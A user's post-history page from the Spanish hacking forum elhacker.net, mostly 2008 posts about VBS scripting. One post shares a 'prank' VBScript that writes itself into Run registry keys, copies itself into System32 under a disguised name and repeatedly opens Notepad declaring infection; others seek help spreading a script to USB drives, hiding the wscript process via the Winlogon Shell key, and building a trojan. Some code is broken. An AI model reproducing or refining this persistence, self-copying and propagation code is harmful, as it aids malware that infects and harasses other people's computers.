elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: 1 2 [3]
21  Programación / Scripting / Mi proyecto broma en vbs en: 11 Octubre 2008, 22:03 pm
Buenas, aca dejando el source de una simple broma en vbs que consta en ejecutar en pantalla el block de notas y escribir en el que esta infectado,etc (Ustedes son libres de moficarlo), es bastante molesto andar cerrando el block cada 1 minuto..

Las personas con menos conocimientos creeran que es alguna clase de virus o troyano que lo ha infectado.  >:D
Buena aca el code, es bastante simple :

Código:
Private Sub Form_Load()

'Declaro algunas variables

Dim Molesto
Dim WSSvar
Dim i
Dim FSOvar

On Error Resume Next

Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"     

              'Se agrega al regsitro
WSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"

              'En este tambien, deben dejar solo uno, es opcional

Set FSOvar = CreateObject("Scripting.FileSystemObject")
FSOvar.CopyFile ".\SexDonkey.exe", "C:\Windows\System32\K-Joke.exe"

              ' Se copia asi mismo, en la ruta donde sera buscado luego en el registro

Do
Wscript.sleep 70000   
      ' No hara nada por 1,10 minutos y despues ejecuta el block de notas

Set Molesto = WSSvar.exec("Notepad.exe")
Wscript.sleep 1500      ' Le da tiempo al notepad para que se termine de abrir

WSSvar.AppActivate Molesto.processid
        ' Esto hara que coloque las palabras sobre el block de notas

Wscript.sleep 700                   'Esto es para asegurarse de que lo hara sobre el
WSSvar.AppActivate Molesto.processid

         'Envia pulsaciones de teclado que se escribiran sobre el notepad.
         'ustedes pueden escribir lo que quieran que les aparecera, como dice ahi.
WSSvar.SendKeys "Has sido infeKtado por mi V-InfeKtor"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "Eliminame si puedes..."
WSSvar.SendKeys "{ENTER}"
Wscript.sleep 670
WSSvar.SendKeys ".___"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#   #     #       #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#    #    #      #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\  #   #     #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | #   #    #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/  #   #   #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#    #    #  #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#   #     # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "##=/      #@"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# .-#     # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\ #    #  #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | #   #   #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/   #  #    #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#      #  #     #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#     #   #      #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#0oo./    #       #"
Loop       'Se repite nuevamente
 
 
End Sub

pueden hacer este agregado si quieren o bien cambiarlo por:

Código:
Dim WSSvar

Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"

pero en caso de agregarlo se iniciarian dos..

jaja no se pregunten porque tiene ese nombre "sexDonkey"  :xD :xD

voy a seguir trabajando en el, espero que quede bueno.




SALUD.O.S
22  Programación / Scripting / Reconocer unidades extraibles en: 11 Octubre 2008, 16:08 pm
Buenas tardes, Me pregunto como es el script correcto para reconocer si hay una o unas unidades extraibles como pendrive, hd externos, tarjetas, etc...

he hecho este codigo pero no me funciona.. :

Código:
Dim FSOvar
Dim Uni

Set FSOvar = createobject("scripting.filesystemobject")
Set Uni = FSOvar.drives
For each x in Uni do
L = x.Drivesletter
if L = true then Objfso.copyfile ".\archivo.vbs",&L&":\"
msgBox "contagio en " &L&
exit do
End if
next

Esta bien asi.??  :-\

He intendao varios codigos pero creo que este es el mas estable.. Si funcionara...  :¬¬

Si alguien puede ayudarme se lo agradeceria..



SALUD.O.S
23  Programación / Scripting / Compilar codigo vbs en un exe en VB6 en: 3 Octubre 2008, 15:02 pm
Hola, me habian comentado con anterioridad lo de compilar el codigo de mi script en el VB6, pero tengo una duda...

Tengo que comenzar un proyecto exe standar o como una dll?

Porque no quiero que tenga ni formularios ni nada, solo que se ejecute, sea un procesos mas, y cumpla con lo programado; cosa que tambien tengo dudas pero no viene al tema , en todo caso mas adelante..

He intentado guardar como exe un ejemplo de reproduccion en los pen-drives o cualquier unidad, es una pavada, si quieren lo posteo. es un ejemplo mediocre pero actualmente esta batante bien.

Gracias de antemano


SALUD.O.S
24  Programación / Scripting / Ocultar el proceso Wscript.exe en: 24 Septiembre 2008, 21:03 pm
Buenas..
Estoy programando un virus en VBS y siempre que lo ejecuto el proceso Wscript se ve en los procesos del admin de tareas. Como hago para que no lo muestre o como hago para Inyectarlo en el Explorer.exe?

Les muestro::

Set Inyec = CreateObject("WScript.Shell")
Inyec.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon","Shell = "Explorer.exe "[Nom_Carp]\Virus.vbs"""

Es la sintaxis correcta? o como hago para inyectarlo en el Explorer.exe?

O sera mas conveniente pasarlo a EXE?

Gracias de antemano..


SALUD.O.S
25  Media / Diseño Gráfico / [Propuesta] Best User Bar en: 13 Febrero 2008, 22:02 pm
Buenas, me estaba haciendo un user bar de mi microprocesador y lei la sección

que dice que podemos crear un batlle arts, bueno mi propuesta es, Hacer un User
 
Bar con el proposito del Microprocesador de cada uno, Que el mas creativo gane!

Esta propuesta nose si se abra echo todavia, La idea es diferente a la de modificar

una imagen y demas, Esto es un battle arts pero de USER BAR...

Bueno, espero criticas puntos a favor, lo que sea...


Espero...


EDITO: La resolucion debe ser 350x20



SALUD.O.S
26  Programación / Programación Visual Basic / Juntar formularios en un solo proyecto en: 6 Febrero 2008, 14:12 pm
Bueno, esa es la duda, como lo hago??  :huh:

Tengo El cliente y el server dentro del mismo grupo pero en diferentes proyectos:

GRUPO1\PROYECT1(Form=cliente)\PROYECT2(Form=server).

Como hago para meter al cliente y al server dentro del mismo proyecto??

gracias de antemano...



SALUD.O.S

27  Programación / Programación Visual Basic / Modulo de conexion en el server, para no depender del OCX en: 30 Enero 2008, 17:16 pm
Como veran, esto lo saque del manual de Hendrix (troyanos en VB)

Bueno, a lo que voy es que cuando intente descargar los modulos, me decia que el archivo no esta, si alguien puede ayudarme . les agradezco ha y una explicacion un poquito mas explicita del tema gracias de antemano..

Es que tengo pensado hacer un troyanito y necesito apoyo del foro...
ok chaauu


SALUD.O.S


28  Media / Juegos y Consolas / Intercambio de Songs para el stepmania!!! en: 17 Noviembre 2007, 17:12 pm
Hola compas!! me gustaria saber si hay alguien en el mundo a quien le guste los arcades del Pump it up o Stepmania o bien jugarlos en la PC, y si hay alguien que "CREA" sus propias Songs o Canciones para jugar al Stepmania, me gustaria saberlo ya que podriamos intercambiar canciones!!

Aclaro, el stepmania es como un emulador de canciones que consiste en reproducir archivos KSF, DWI, MP3,WMA(creo), BMP,GIF,JPG,etc... si alguien quiere que se lo pase solo debe pedirmelo.

Comenten  ;)


SALUD.O.S
29  Programación / Ejercicios / Los que sepan de pascal, entren xfavor... en: 17 Noviembre 2007, 14:26 pm
Hola, bueno queria decirles que he leido pagina por pagina, (las cuatro paginas) y he visto que solo hay 6 o 7 temas de pascal, pero los que dicen ejercicios, no es que te dan ejercicios para resolver, que es lo que ando buscando, sino que le ayudan a resolver el suyo... Tambien vi que en la primera pagina hay tema bloqueado con ejercicios de este pero necesito algo mas sencillo se me entienden, aunque ya he resuelto un par jeje ... bueno, a lo que voy es que , si hay alguien que entienda de pascal que si por favor podria darme un par de ejercicios basicos de principiantes para que yo puede desarrolar y si necesito ayuda, que alguien me oriente...  :-\ 

bueno, si saben de algun ejercicio basico o algo , me lo postearian porfavor???

Cualquier ayuda es bienvenida.

Gracias de antemano y aviso que esto no solo me ayudaria a mi, sino a otras personas con los mismos objetivos...




SALUD.O.S
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines